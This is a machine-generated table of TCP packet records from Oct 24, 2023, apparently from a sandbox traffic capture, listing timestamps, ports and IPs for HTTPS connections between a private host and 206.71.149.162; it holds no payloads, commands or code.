| Oct 24, 2023 06:55:22.751233101 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.751286030 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.751507044 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.751606941 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.751966000 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.752052069 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.752334118 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.752393961 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.752715111 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.752773046 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.753063917 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.753132105 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.753638983 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.753691912 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.754018068 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.754075050 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.754646063 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.754703999 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.755379915 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.755439997 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.756222963 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.756299973 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.756771088 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.756829023 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.757289886 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.757350922 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.757971048 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.758028984 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.758502007 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.758570910 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.759217024 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.759275913 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.760066032 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.760134935 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.760668993 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.760729074 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.761172056 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.761224985 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.761817932 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.761884928 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.762425900 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.762484074 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.762981892 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.763036966 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.763614893 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.763669968 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.764270067 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.764328957 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.839371920 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.839555979 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.846359968 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.846429110 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.848658085 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.848722935 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.852154970 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.852220058 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.854192019 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.854254007 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.856040001 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.856102943 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.857878923 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.857944965 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.859246969 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.859308004 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.860234022 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.860296011 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.861948967 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.862008095 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.862363100 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.862421036 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.864280939 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.864347935 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.865631104 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.865684032 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.866133928 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.866194963 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.870641947 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.870707035 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.871289015 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.871345043 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.872200012 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.872258902 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.873095036 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.873157024 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.873934984 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.873999119 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.874772072 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.874840975 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.875241995 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.875300884 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.876745939 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.876806021 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.877197027 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.877259970 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.877850056 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.877911091 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.879411936 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.879472017 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.879839897 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.879899979 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.880486012 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.880543947 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.880985022 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.881038904 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.883027077 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.883081913 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.883878946 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.883941889 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.884322882 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.884382010 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.885468960 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.885528088 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.885857105 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.885915995 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.886287928 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.886343956 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.887275934 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.887339115 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.887634039 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.887691975 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.888437986 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.888500929 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.889266968 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.889332056 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.890269041 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.890328884 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.891120911 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.891180992 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.891601086 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.891663074 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.904211998 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.904303074 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.906980038 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.907044888 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.907702923 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.907764912 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.908461094 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.908525944 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.908802986 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.908863068 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.909697056 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.909753084 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.910202980 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.910259008 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.911041021 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.911096096 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.912261009 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.912323952 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.912784100 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.912847996 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.913609982 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.913664103 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.915293932 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.915354967 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.916104078 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.916187048 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.917289019 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.917345047 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.918216944 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.918272018 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.919486046 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.919548988 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.920156956 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.920221090 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.920638084 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.920691013 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.921675920 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.921731949 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.922508955 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.922568083 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.930486917 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.930552959 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.931611061 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.931670904 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.934034109 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.934092999 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.935537100 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.935596943 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.936007977 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.936073065 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.937607050 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.937674046 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.938036919 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.938110113 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.938486099 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.938534975 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.939663887 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.939728975 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.940407038 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.940468073 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.940979958 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.941041946 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.941891909 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.941951990 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.942512989 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.942569971 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.944307089 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.944367886 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.944762945 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.944817066 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.946147919 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.946208000 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.946652889 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.946711063 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.948369026 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.948431015 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.948832989 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.948893070 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.949480057 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.949541092 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.949934006 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.949990988 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.950452089 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.950505972 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.950979948 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.951035976 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.951605082 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.951662064 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.951678038 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.951699972 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:22.951720953 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.951759100 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.951968908 CEST | 49740 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:22.951982021 CEST | 443 | 49740 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:25.172188997 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:25.172233105 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:25.172296047 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:25.172808886 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:25.172825098 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:25.682169914 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:25.682233095 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:25.692909002 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:25.692931890 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:25.693223953 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:25.693228960 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:26.018759012 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:26.018795967 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:26.018831015 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:26.018848896 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:26.018863916 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:26.018915892 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:26.353207111 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:26.353245020 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:26.353317022 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:26.695609093 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:26.695633888 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:26.695758104 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:26.862720013 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:26.862863064 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:27.070622921 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:27.070638895 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:27.070760012 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:27.237920046 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:27.238066912 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:27.405654907 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:27.405793905 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:27.573501110 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:27.573605061 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:27.741280079 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:27.741564989 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:27.822330952 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:27.822561979 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:27.949841022 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:27.950031042 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:28.117444038 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:28.117542028 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:28.246047974 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:28.246174097 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:28.324457884 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:28.324573040 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:28.452792883 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:28.452896118 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
